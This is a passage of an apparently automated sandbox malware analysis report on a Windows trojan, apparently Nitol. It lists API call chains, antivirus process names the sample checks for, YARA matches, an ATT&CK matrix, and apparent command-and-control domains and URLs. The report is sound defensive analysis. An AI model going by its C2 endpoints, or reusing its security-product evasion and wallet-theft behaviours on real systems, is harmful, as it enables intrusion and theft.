                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_006585AB
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C30FC04
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_6C305C68
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_6C304CBE
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C30FCF0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesA,6_2_6C30FCC6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C30FD57
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C30FD93
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoA,6_2_6C313FD6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_6C30F83C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_6C30F931
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_6C30594A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C30F9D8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C30FA33
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C30E436
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C30E510
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,6_2_6C2FB122
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,6_2_6C30F2B0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_033423C9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_0334D641
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_033254C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_0334DA58
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_0334D932
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_0334293C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_0334D9CD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_0334D8E7
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0334DFB0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_0334DEDD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0334DDD5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_0334DCAD
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_100503A5
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_100334A0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_1005B61D
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_1005B8C3
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_1005B90E
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_10050918
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesW,6_2_1005B9A9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_1005BA34
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_1005BC89
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_1005BDB1
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,6_2_1005BEB9
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_1005BF8C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_6C30FC04
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_6C305C68
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_6C304CBE
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6C30FCF0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: EnumSystemLocalesA,7_2_6C30FCC6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_6C30FD57
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_6C30FD93
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoA,7_2_6C313FD6
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_6C30F83C
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_6C30F931
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,7_2_6C30594A
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_6C30F9D8
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_6C30FA33
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_6C30E436
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_6C30E510
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,7_2_6C2FB122
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,7_2_6C30F2B0
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00639CAB GetSystemTimeAsFileTime,__aulldiv,0_2_00639CAB
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033254C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,6_2_033254C4
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeCode function: 6_2_033436E1 _free,GetTimeZoneInformation,_free,6_2_033436E1
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_0053F694 _memset,GetVersionExW,0_2_0053F694
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 33MwVPy.exeBinary or memory string: acs.exe
                Source: 33MwVPy.exeBinary or memory string: kxetray.exe
                Source: 33MwVPy.exeBinary or memory string: vsserv.exe
                Source: 33MwVPy.exeBinary or memory string: avcenter.exe
                Source: 33MwVPy.exeBinary or memory string: cfp.exe
                Source: 33MwVPy.exe, 33MwVPy.exe, 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, 33MwVPy.exe, 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
                Source: 33MwVPy.exeBinary or memory string: avp.exe
                Source: Rudvfa0Z17.exe, 33MwVPy.exeBinary or memory string: 360tray.exe
                Source: 33MwVPy.exeBinary or memory string: rtvscan.exe
                Source: 33MwVPy.exeBinary or memory string: TMBMSRV.exe
                Source: 33MwVPy.exeBinary or memory string: ashDisp.exe
                Source: 33MwVPy.exeBinary or memory string: avgwdsvc.exe
                Source: 33MwVPy.exeBinary or memory string: AYAgent.aye
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fender\MsMpeng.exe
                Source: 33MwVPy.exeBinary or memory string: QUHLPSVC.EXE
                Source: 33MwVPy.exeBinary or memory string: RavMonD.exe
                Source: 33MwVPy.exeBinary or memory string: Mcshield.exe
                Source: 33MwVPy.exe, 00000006.00000002.3882524922.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: der\MsMpeng.exe
                Source: 33MwVPy.exeBinary or memory string: K7TSecurity.exe
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: 6.2.33MwVPy.exe.3258c24.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.32f2c24.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.3258c24.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.32f2c24.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 33MwVPy.exe PID: 3116, type: MEMORYSTR
                Tries to access browser extension known for cryptocurrency wallets
                Source: C:\Program Files (x86)\90m3FHO\33MwVPy.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected Nitol
                Source: Yara matchFile source: 6.2.33MwVPy.exe.3258c24.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.32f2c24.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.3258c24.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.33MwVPy.exe.32f2c24.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3883625638.0000000010064000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3883097194.0000000003258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3883140414.00000000032F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 33MwVPy.exe PID: 3116, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Rudvfa0Z17.exeCode function: 0_2_00417CF0 WSAStartup,htons,htons,inet_addr,socket,bind,WSAGetLastError,WSAAsyncSelect,listen,0_2_00417CF0

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                Credential API Hooking                		12
                System Time Discovery                		Remote Services11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API                		1
                Create Account                		1
                Access Token Manipulation                		1
                Deobfuscate/Decode Files or Information                		11
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter                		11
                Windows Service                		11
                Windows Service                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts12
                Service Execution                		1
                Registry Run Keys / Startup Folder                		13
                Process Injection                		1
                DLL Side-Loading                		NTDS247
                System Information Discovery                		Distributed Component Object Model1
                Credential API Hooking                		15
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Registry Run Keys / Startup Folder                		2
                Masquerading                		LSA Secrets571
                Security Software Discovery                		SSH11
                Input Capture                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                Virtualization/Sandbox Evasion                		Cached Domain Credentials23
                Virtualization/Sandbox Evasion                		VNC3
                Clipboard Data                		Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync13
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                Process Injection                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Indicator Removal                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499612 Sample: Rudvfa0Z17.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 30 web.ad87h92j.com 2->30 32 mvc.withoutyou5.com 2->32 34 2 other IPs or domains 2->34 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 7 other signatures 2->48 7 Rudvfa0Z17.exe 4 22 2->7         started        12 33MwVPy.exe 2->12         started        14 33MwVPy.exe 2->14         started        16 OpenWith.exe 3 2->16         started        signatures3 process4 dnsIp5 40 web.ad87h92j.com 188.114.97.3, 61382, 61383, 80 CLOUDFLARENETUS European Union 7->40 22 C:\Program Files (x86)\90m3FHO\libcef.dll, PE32 7->22 dropped 24 C:\Program Files (x86)\...\VCRUNTIME140.dll, PE32 7->24 dropped 26 C:\Program Files (x86)\90m3FHO\MSVCP140.dll, PE32 7->26 dropped 28 3 other malicious files 7->28 dropped 58 Found API chain indicative of debugger detection 7->58 18 33MwVPy.exe 3 7->18         started        60 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->60 62 Hides threads from debuggers 12->62 file6 signatures7 process8 dnsIp9 36 cacer.goldenh0ur.com 104.21.17.45, 443, 61384 CLOUDFLARENETUS United States 18->36 38 mvc.withoutyou5.com 104.26.6.127, 443, 61385, 61386 CLOUDFLARENETUS United States 18->38 50 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->50 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->52 54 Tries to access browser extension known for cryptocurrency wallets 18->54 56 Hides threads from debuggers 18->56 signatures10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Rudvfa0Z17.exe29%ReversingLabsWin32.Trojan.Zenpak
                Rudvfa0Z17.exe47%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\90m3FHO\t4d.tmp100%AviraDR/FakePic.Gen
                C:\Program Files (x86)\90m3FHO\t5d.tmp100%AviraDR/FakePic.Gen
                C:\Program Files (x86)\90m3FHO\33MwVPy.exe0%ReversingLabs
                C:\Program Files (x86)\90m3FHO\MSVCP140.dll0%ReversingLabs
                C:\Program Files (x86)\90m3FHO\VCRUNTIME140.dll0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                web.ad87h92j.com0%VirustotalBrowse
                15.164.165.52.in-addr.arpa0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
                http://www.openssl.org/support/faq.html0%URL Reputationsafe
                https://mvc.withoutyou5.com/0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_cod0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3172/qr_code.do0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmps0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/U0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask0%Avira URL Cloudsafe
                https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleep0%Avira URL Cloudsafe
                https://data.iana.org/time-zones/tz-link.htmlPostScript0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/0%VirustotalBrowse
                https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_cod0%VirustotalBrowse
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.json0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/im0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/long.bmp#knR0%Avira URL Cloudsafe
                https://data.iana.org/time-zones/tz-link.htmlPostScript0%VirustotalBrowse
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.json0%VirustotalBrowse
                https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.com0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3172/qr_code.do0%VirustotalBrowse
